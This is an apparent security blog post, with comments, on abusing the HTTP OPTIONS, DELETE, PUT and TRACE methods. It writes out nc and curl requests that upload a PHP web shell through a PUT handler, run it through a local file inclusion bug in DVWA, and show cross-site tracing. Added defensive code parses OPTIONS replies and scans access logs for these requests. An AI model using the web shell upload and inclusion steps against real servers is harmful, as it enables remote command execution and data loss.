The HTTP protocol comprises the following verbs or methods.
- GET
- HEAD
- POST
- PUT
- DELETE
- CONNECT
- OPTIONS
- TRACE
I assume you are well aware of these; you can read more about them in detail in the RFC documents listed under References.
I will show some interesting HTTP verbs which can be used to break into servers. Well, these attacks are quite rare, but I thought of sharing 🙂
OPTIONS
If the OPTIONS verb is enabled on the server, it can be used to view all the HTTP methods that are configured.
[code]
% nc localhost 80
OPTIONS / HTTP/1.0

HTTP/1.1 200 OK
Allow: OPTIONS, TRACE, GET, HEAD, POST
Server: Microsoft-IIS/7.5
Public: OPTIONS, TRACE, GET, HEAD, POST
X-Powered-By: ASP.NET
Date: Sun, 14 Jun 2015 05:31:10 GMT
Connection: close
[/code]
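An OPTIONS reply like the one above is the first thing to review on a server you are responsible for. The script below is an added example written for this page, not code from the original post: it parses a raw OPTIONS response (the sample is constructed to mirror the IIS reply above), collects the methods from the Allow header and the non-standard Public header, and returns the ones that deserve a closer look. Which methods count as "risky" is this example's own choice, based on the DELETE, PUT and TRACE sections of the post.

```python
"""Parse an HTTP OPTIONS response and flag methods worth reviewing.

Added example for this page, not code from the original post. The sample
response is constructed to mirror the IIS reply shown in the post; the
set of "risky" methods is this example's own classification.
"""

# Methods that change or expose server state and usually should be disabled
# unless a specific handler needs them (see the DELETE, PUT and TRACE sections).
RISKY_METHODS = {"PUT", "DELETE", "TRACE"}

# Constructed sample: an OPTIONS response like the one in the post.
SAMPLE_OPTIONS_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Allow: OPTIONS, TRACE, GET, HEAD, POST\r\n"
    "Server: Microsoft-IIS/7.5\r\n"
    "Public: OPTIONS, TRACE, GET, HEAD, POST\r\n"
    "X-Powered-By: ASP.NET\r\n"
    "Date: Sun, 14 Jun 2015 05:31:10 GMT\r\n"
    "Connection: close\r\n"
    "\r\n"
)


def parse_headers(raw_response: str) -> dict:
    """Return {lower-cased header name: value} for the header block of a raw response."""
    head, _, _body = raw_response.partition("\r\n\r\n")
    headers = {}
    for line in head.split("\r\n")[1:]:  # skip the status line
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def advertised_methods(raw_response: str) -> set:
    """Methods listed in Allow (RFC 7231) or in the non-standard Public header."""
    headers = parse_headers(raw_response)
    methods = set()
    for name in ("allow", "public"):
        if name in headers:
            methods.update(
                m.strip().upper() for m in headers[name].split(",") if m.strip()
            )
    return methods


def risky_methods(raw_response: str) -> set:
    """Subset of the advertised methods that a reviewer should question."""
    return advertised_methods(raw_response) & RISKY_METHODS


if __name__ == "__main__":
    print("advertised:", sorted(advertised_methods(SAMPLE_OPTIONS_RESPONSE)))
    print("review:", sorted(risky_methods(SAMPLE_OPTIONS_RESPONSE)))
```

Allow describes the resource the OPTIONS request targeted, so a clean list for `/` says nothing about `/put.php` or a WebDAV-enabled directory; treat the result as a hint to check the server configuration, not as proof that a method is disabled.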
DELETE
The DELETE verb is dangerous and can be misused. If it is misconfigured, it can be used to delete resources from the web server.
[code]
% nc localhost 80
DELETE /location/resource HTTP/1.0

Date: Sun, 14 Jun 2015 05:01:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=ete39c4b0uk83phvucj1ftbsn5; expires=Mon, 15 Jun 2015 05:01:22 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
[/code]
PUT
This verb can be used to upload a resource to the server. It is also a risky verb if not configured appropriately. For example, suppose we want to write "<?php echo 'Hello World'; ?>" into a new file named "hello.php". Make sure you give the correct length of your payload in Content-Length (the number of bytes in the body).
[code]
% cat -e hello.php
<?php echo 'Hello World'; ?>$
% wc -m hello.php
29 hello.php
% nc localhost 80
PUT /hello.php HTTP/1.0
Content-Type: text/html
Content-Length: 29

<?php echo 'Hello World'; ?>
[/code]
PUT verb in PHP
PHP supports the PUT verb. This is a sample program which receives the data from the PUT request and saves it as "myfile".
[code language="php"]
<?php
// Read the raw request body (the PUT payload) from php://input
// and copy it, 1 KiB at a time, into "myfile" in the current directory.
$putdata = fopen("php://input", "r");
$fp = fopen("myfile", "w");
while ($data = fread($putdata, 1024)) {
    fwrite($fp, $data);
}
fclose($fp);
fclose($putdata);
?>
[/code]
I will save this as “put.php” in my root directory of the web server.
Now we can request “put.php” using the PUT verb and send our payload.
[code]
% cat -e phpinfo.php
<?php phpinfo(); ?>$
% wc -m phpinfo.php
20 phpinfo.php
% nc 192.168.1.5 80
PUT /put.php HTTP/1.0
Content-Type: text/html
Content-Length: 20

<?php phpinfo(); ?>
HTTP/1.1 200 OK
Date: Mon, 15 Jun 2015 06:48:16 GMT
Server: Apache/2.4.7 (Win32) OpenSSL/0.9.8y PHP/5.4.22
X-Powered-By: PHP/5.4.22
Content-Length: 0
Connection: close
Content-Type: text/html
[/code]
Now if you view "myfile", our payload should be written there.
Suppose you have a local file inclusion situation; in a case like that, we can include the file we just wrote using PUT.
This is an example of local file inclusion. I’ll be using DVWA to demonstrate this.
[code language="php"]
<?php
// The "page" parameter is passed straight to include without any validation,
// so a request can pull in any file the web server user is allowed to read.
echo "File included: " . $_REQUEST["page"] . "<br>";
$file = $_REQUEST["page"];
include $file;
?>
[/code]
http://localhost/dvwa/vulnerabilities/fi/?page=../../../myfile
Suppose we want to upload a simple web shell we can do it like the following 😉
[code]
% wc -m shell.php
189 shell.php
% nc 192.168.1.5 80
PUT /put.php HTTP/1.0
Content-Type: text/html
Content-Length: 189

<?php print '<form method="post"> Command: <input type="text" name="__"><br> <input type="submit"> </form>'; if(isset($_POST["__"])) print '<pre>'.shell_exec($_POST["__"]).'</pre>'; ?>
HTTP/1.1 200 OK
Date: Mon, 15 Jun 2015 07:39:42 GMT
Server: Apache/2.4.7 (Win32) OpenSSL/0.9.8y PHP/5.4.22
X-Powered-By: PHP/5.4.22
Content-Length: 0
Connection: close
Content-Type: text/html
[/code]
After that, include our "myfile" and you can execute commands on the server.
You can also use curl to upload a file using PUT easily.
[code]
% curl http://192.168.1.5/put.php --upload-file shell.php -v
* About to connect() to 192.168.1.5 port 80 (#0)
*   Trying 192.168.1.5...
* connected
* Connected to 192.168.1.5 (192.168.1.5) port 80 (#0)
> PUT /put.php HTTP/1.1
> User-Agent: curl/7.26.0
> Host: 192.168.1.5
> Accept: */*
> Content-Length: 189
> Expect: 100-continue
>
* additional stuff not fine transfer.c:1037: 0 0
* HTTP 1.1 or later with persistent connection, pipelining supported
< HTTP/1.1 100 Continue
* additional stuff not fine transfer.c:1037: 0 0
* We are completely uploaded and fine
* HTTP 1.1 or later with persistent connection, pipelining supported
< HTTP/1.1 200 OK
< Date: Mon, 15 Jun 2015 07:47:44 GMT
< Server: Apache/2.4.7 (Win32) OpenSSL/0.9.8y PHP/5.4.22
< X-Powered-By: PHP/5.4.22
< Content-Length: 0
< Content-Type: text/html
<
* Connection #0 to host 192.168.1.5 left intact
* Closing connection #0
[/code]
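Every request in the PUT, DELETE and file-inclusion walkthrough above leaves a line in the web server's access log, which is where a defender would catch this. The scanner below is an added example for this page, not code from the original post: it parses Apache/nginx combined-format lines, flags PUT, DELETE and TRACE requests (rated higher when the server answered 2xx), and flags `../` traversal in the request target after URL-decoding it. The log lines, IP addresses and timestamps are constructed to resemble the requests shown in the post.

```python
"""Scan web-server access logs for the verb abuse and LFI requests shown in the post.

Added example for this page, not code from the original post. The log lines
below are constructed (made-up IPs and timestamps) in Apache combined format.
"""
import re
from urllib.parse import unquote

# Apache/nginx "combined" log format: client, ident, user, [time], "request", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/[\d.]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

WRITE_METHODS = {"PUT", "DELETE"}  # modify resources on the server
TRACE_METHOD = "TRACE"             # echoes the request back (cross-site tracing)

# Constructed sample log: the post's PUT, DELETE, LFI and TRACE requests plus benign noise.
SAMPLE_LOG_LINES = [
    '192.168.1.10 - - [15/Jun/2015:06:48:16 +0000] "PUT /put.php HTTP/1.0" 200 0 "-" "-"',
    '192.168.1.10 - - [15/Jun/2015:07:39:42 +0000] "PUT /put.php HTTP/1.0" 200 0 "-" "-"',
    '192.168.1.10 - - [14/Jun/2015:05:01:22 +0000] "DELETE /location/resource HTTP/1.0" 200 0 "-" "-"',
    '10.0.0.3 - - [15/Jun/2015:08:00:00 +0000] "GET /dvwa/vulnerabilities/fi/?page=../../../myfile HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.3 - - [15/Jun/2015:08:00:05 +0000] "GET /dvwa/vulnerabilities/fi/?page=..%2F..%2Fmyfile HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.4 - - [17/Jun/2015:07:58:18 +0000] "TRACE / HTTP/1.1" 200 123 "-" "curl/7.26.0"',
    '10.0.0.5 - - [17/Jun/2015:07:59:00 +0000] "PUT /x.php HTTP/1.1" 405 0 "-" "curl/7.26.0"',
    '10.0.0.6 - - [17/Jun/2015:08:00:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]


def parse_line(line: str):
    """Return the parsed fields of one combined-format line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry: dict) -> list:
    """Return a list of (severity, reason) findings for one parsed log entry."""
    findings = []
    status = int(entry["status"])
    accepted = 200 <= status < 300
    method = entry["method"]
    outcome = "accepted" if accepted else "rejected (%d)" % status

    if method in WRITE_METHODS:
        findings.append(("high" if accepted else "medium",
                         "%s request %s for %s" % (method, outcome, entry["target"])))
    if method == TRACE_METHOD:
        findings.append(("high" if accepted else "low",
                         "TRACE request %s (cross-site tracing exposure)" % outcome))

    # Decode %2F / %2E so encoded traversal is caught as well as the plain form.
    decoded = unquote(entry["target"])
    if "../" in decoded or "..\\" in decoded:
        findings.append(("high" if accepted else "medium",
                         "path traversal in request target %s" % decoded))
    return findings


def scan(lines) -> list:
    """Scan an iterable of log lines and return one finding dict per issue found."""
    results = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue  # not combined format (or a truncated line); skip it
        for severity, reason in classify(entry):
            results.append({"ip": entry["ip"], "time": entry["ts"],
                            "severity": severity, "reason": reason})
    return results


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG_LINES):
        print("[%s] %s %s: %s" % (finding["severity"], finding["time"],
                                  finding["ip"], finding["reason"]))
```

A rejected PUT (405 in the sample) is still worth a medium rating, because it shows someone probing for exactly the misconfiguration the post describes; a long run of them from one address is a useful early warning even when the server is configured correctly.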
Thanks for reading !
References
[1] http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
[2] https://tools.ietf.org/html/rfc7231
wow, awesome bro . It is a new thing to learn it 😀 Thanks for writing 🙂
wow :O really nice (y) Thankx 4 sharing
Thanks for the feedback !
Nice share, you explained how to exploit PUT & DELETE, so, what about the TRACE method?
In the TRACE method you can inject your own header, for example:
[code]
root@kali:~/temp# curl -v -X TRACE -H "X-Header: Osanda" Host.com
* About to connect() to Host.com port 80 (#0)
* Trying 1.1.1.1...
* connected
* Connected to Host.com (1.1.1.1) port 80 (#0)
> TRACE / HTTP/1.1
> User-Agent: curl/7.26.0
> Host: Host.com
> Accept: */*
> X-Header: Osanda
>
* additional stuff not fine transfer.c:1037: 0 0
* HTTP 1.1 or later with persistent connection, pipelining supported
< HTTP/1.1 200 OK
< Date: Wed, 17 Jun 2015 07:58:18 GMT
< Server: Apache/2.2.3 (CentOS)
< Connection: close
< Transfer-Encoding: chunked
< Content-Type: message/http
<
TRACE / HTTP/1.1
User-Agent: curl/7.26.0
Host: Host.com
Accept: */*
X-Header: Osanda
[/code]
This can lead to stealing of cookies even if the HttpOnly flag is set.
More information on XST attacks:
https://www.owasp.org/index.php/Cross_Site_Tracing